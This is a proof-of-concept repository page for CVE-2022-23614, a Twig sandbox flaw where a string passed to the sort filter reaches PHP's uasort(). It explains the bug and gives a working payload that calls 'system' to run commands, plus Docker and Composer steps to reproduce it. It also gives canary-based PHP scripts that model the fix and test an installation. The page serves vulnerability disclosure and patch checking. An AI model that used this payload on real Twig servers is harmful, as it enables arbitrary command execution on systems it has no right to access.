
CVE-2022-23614 PoC — Code injection in Twig

Source
Associated Vulnerability
Title: Code injection in Twig (CVE-2022-23614)
Description: Twig is an open source template language for PHP. When in a sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code. Patched versions now disallow calling non Closure in the `sort` filter as is the case for some other filters. Users are advised to upgrade.
Description
Proof of concept for CVE-2022-23614 (command injection in Twig)
Readme
# CVE-2022-23614

Proof of concept (PoC) for [CVE-2022-23614](https://nvd.nist.gov/vuln/detail/CVE-2022-23614) referenced in the [DSA-5107-1](https://www.debian.org/security/2022/dsa-5107).

- **CVSS-2.0**: 7.5
- **CVSS-3.X**: 9.8

## Explanation

Twig is a flexible, fast, and secure template engine for PHP. Filters transform values inside a template when it is rendered. The `sort` filter sorts the elements of an array; its optional argument (`arrow`) is a comparison callable, not a sort direction, so a descending sort is written with an arrow function:

```twig
{{ [5,8,2,3]|sort }}
{{ [5,8,2,3]|sort((a, b) => b - a) }}
```

Twig has a sandbox mode to evaluate untrusted template code. When in this sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code. Under the hood the filter hands `arrow` straight to PHP's `uasort()`, which accepts any string naming a PHP function and invokes it as the comparator with pairs of array elements as arguments. The sandbox policy only checks the tags, filters, functions, methods and properties a template names explicitly; a function name passed as a plain string argument is never inspected. In the payload below the array is `["id", ""]` and the comparator is `system`, so the first comparison is `system("id", "")`, which executes `id`:

```twig
{{ ["id",""]|sort('system') }}
```
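The mechanism in plain PHP, as an added example that is neither Twig's code nor the PoC's `index.php`: a stripped-down model of the `sort` filter's `arrow` handling in its vulnerable and patched shapes. Everything prefixed `demo_` is this example's own, `$sandboxed` stands in for the sandbox state that real Twig reads from its `Environment`, and a recording comparator takes the place of `system` so the script runs on any PHP 7+ with nothing else installed.

```php
<?php
// Added example (not Twig's code and not the PoC's index.php): a stripped-down
// model of the `sort` filter's `arrow` handling before and after the fix.
// Everything prefixed demo_ is this example's own; $sandboxed stands in for
// the sandbox state that real Twig reads from its Environment.

// Before the fix: the template-supplied arrow goes straight to uasort(), and
// uasort() accepts any string that names a PHP function. Nothing here looks
// at whether the template is sandboxed.
function demo_sort_filter_vulnerable(array $array, $arrow = null): array
{
    if (null !== $arrow) {
        uasort($array, $arrow);
    } else {
        asort($array);
    }
    return $array;
}

// After the fix: inside the sandbox only a real Closure is accepted as the
// arrow, so a function name smuggled in as a string never reaches uasort().
function demo_sort_filter_fixed(bool $sandboxed, array $array, $arrow = null): array
{
    if (null !== $arrow && $sandboxed && !$arrow instanceof Closure) {
        throw new RuntimeException(
            'The callable passed to the "sort" filter must be a Closure in sandbox mode.'
        );
    }
    return demo_sort_filter_vulnerable($array, $arrow);
}

// Stand-in for system(): records its arguments instead of running a command.
$demo_calls = [];
function demo_canary($a, $b): int
{
    global $demo_calls;
    $demo_calls[] = [$a, $b];
    return strcmp((string) $a, (string) $b);
}

// The page's payload shape: the array ["id", ""] and the arrow as a plain
// string (the real PoC passes 'system' here).
$args  = ['id', ''];
$arrow = 'demo_canary';

demo_sort_filter_vulnerable($args, $arrow);
// For two elements uasort() makes one comparison, with the elements in array
// order, so system() would get "id" as its command string.
echo 'vulnerable: comparator called with ', json_encode($demo_calls), "\n";

try {
    demo_sort_filter_fixed(true, $args, $arrow);
} catch (RuntimeException $e) {
    echo 'fixed (sandboxed): ', $e->getMessage(), "\n";
}

// A genuine Closure is still accepted in sandbox mode; it cannot name a PHP
// function by string, so the sandbox policy remains the only gate.
$desc = demo_sort_filter_fixed(true, [5, 8, 2, 3], function ($a, $b) {
    return $b <=> $a;
});
echo 'fixed, Closure arrow: ', implode(',', $desc), "\n";
```

The point of the recorded call is the argument order: with the page's `["id", ""]` the comparator receives `"id"` first, which is exactly the position `system()` reads its command from.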

## Usage

This PoC illustrates the vulnerability in two setups: the Debian `php-twig` package (v2.14.1) or the Composer package `twig/twig` (v2.14).

`index.php` builds a Twig template from its first argument: `argv[1]` is the name of the PHP function that Twig will hand to the `sort` filter as its comparator when rendering.

```php
// index.php - line 28
$templateCode .= "{{ args|sort('" . $sortFunction . "') }}\n";
```

`index.php` then loads the generated template through two deprecated Twig functions. Finally, it decodes the second argument (`argv[2]`, a JSON object) and passes it as the template context; the `args` array to be sorted comes from there.

```php
// index.php - line 44
$renderedTemplate = $modifiedTemplate->render($arrayToSort);
```

The rendered template is then printed to standard output.

> Please note this repository was made for **demonstration purposes only**. It is meant to be simple to understand and easy to drive from the command line in order to play with the CVE. It is quite far from what one finds on an actual vulnerable server.
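A check for your own installation, as an added example that is not the repository's `index.php`: the same template shape rendered through Twig's real sandbox API (`Twig\Environment`, `ArrayLoader`, `SandboxExtension`, `SecurityPolicy`) with a policy that allows only the `sort` and `join` filters and no functions at all. The user-defined function `poc_canary` and the template name `probe` are this example's own, and the canary stands in for `system`. Run it in a directory where `composer require twig/twig` has been executed: on a vulnerable 2.14.x release the sandboxed template calls the canary, on a patched release (2.14.11 / 3.3.8 or later) Twig throws a `RuntimeError` before `uasort()` is reached.

```php
<?php
// Added example (not the repository's index.php, not Twig's own code): probe
// whether the installed twig/twig lets a string `arrow` through the `sort`
// filter inside the sandbox. Assumes `composer require twig/twig` was run in
// this directory. poc_canary() and the template name 'probe' are this
// example's own.

require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Error\RuntimeError;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityPolicy;

// Harmless stand-in for system(): counts calls and behaves like a comparator.
// Replacing the string 'poc_canary' below with 'system' and the context with
// ['args' => ['id', '']] gives the page's payload.
$GLOBALS['poc_canary_calls'] = 0;
function poc_canary($a, $b): int
{
    $GLOBALS['poc_canary_calls']++;
    return strcmp((string) $a, (string) $b);
}

// Strict policy: no tags, no methods/properties, no functions at all, and
// only the two filters the probe template uses. The policy never sees the
// string 'poc_canary' because it is a literal argument, not a function call.
$policy = new SecurityPolicy([], ['sort', 'join'], [], [], []);

$twig = new Environment(new ArrayLoader([
    // Same template shape index.php builds: the arrow is a string literal.
    'probe' => "{{ args|sort('poc_canary')|join(',') }}",
]));
$twig->addExtension(new SandboxExtension($policy, true)); // sandboxed = true

try {
    $out = $twig->render('probe', ['args' => ['b', 'c', 'a']]);
    if ($GLOBALS['poc_canary_calls'] > 0) {
        echo "VULNERABLE: the sandboxed template invoked poc_canary() ",
             "{$GLOBALS['poc_canary_calls']} time(s); rendered: $out\n";
    } else {
        echo "Rendered without reaching poc_canary(): $out\n";
    }
} catch (RuntimeError $e) {
    // Patched Twig rejects a non-Closure arrow while sandboxed, before
    // uasort() is ever called.
    echo "PATCHED: ", $e->getMessage(), "\n";
}
```

Because the probe never names `poc_canary` as a Twig function, a policy that forbids every function still passes at compile time; only the runtime Closure check added by the fix stops the call, which is why upgrading, not tightening the `SecurityPolicy`, is the remediation.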

### php-twig

Using Docker, we are able to recreate the context of the original [Debian Security Advisory (DSA)](https://www.debian.org/security/2022/dsa-5107). You can use the given `build-docker.sh` script in order to properly build and run the vulnerable container.

```
chmod a+x build-docker.sh
./build-docker.sh
```

The container shuts down once the payload (an `id` command) has executed. To try your own commands, run the container interactively:

```
docker build -t cve-2022-23614 .
docker run -it --rm cve-2022-23614 /bin/bash
```

Once in the container, you can craft your own payload using the following model:

```
php index.php system '{"args":["id",""]}'
                ^                 ^
          sorting function   array to sort
```

> This dockerfile was partially created using [DECRET](https://github.com/Orange-OpenSource/decret).

### Composer

If you already have PHP and Composer installed, you can reproduce the exploit with the vulnerable Composer package:

```
cd exploit
composer install
```

Then run the payload:

```
php index.php system '{"args":["id",""]}'
```

---

## References

**CVE details**: https://nvd.nist.gov/vuln/detail/CVE-2022-23614

**DSA**: https://www.debian.org/security/2022/dsa-5107

**Patch commit**: https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9

**PoC by davwwwx** (using GUI): https://github.com/davwwwx/CVE-2022-23614
File Snapshot

```
[4.0K] /data/pocs/8051fce50292fce7f1634c7d7680d17df6f1cbbd
├── [ 101] build-docker.sh
├── [ 697] Dockerfile
├── [4.0K] exploit
│   ├── [ 181] composer.json
│   ├── [8.7K] composer.lock
│   └── [1.4K] index.php
├── [3.4K] README.md
└── [ 231] snapshot.list

1 directory, 7 files
```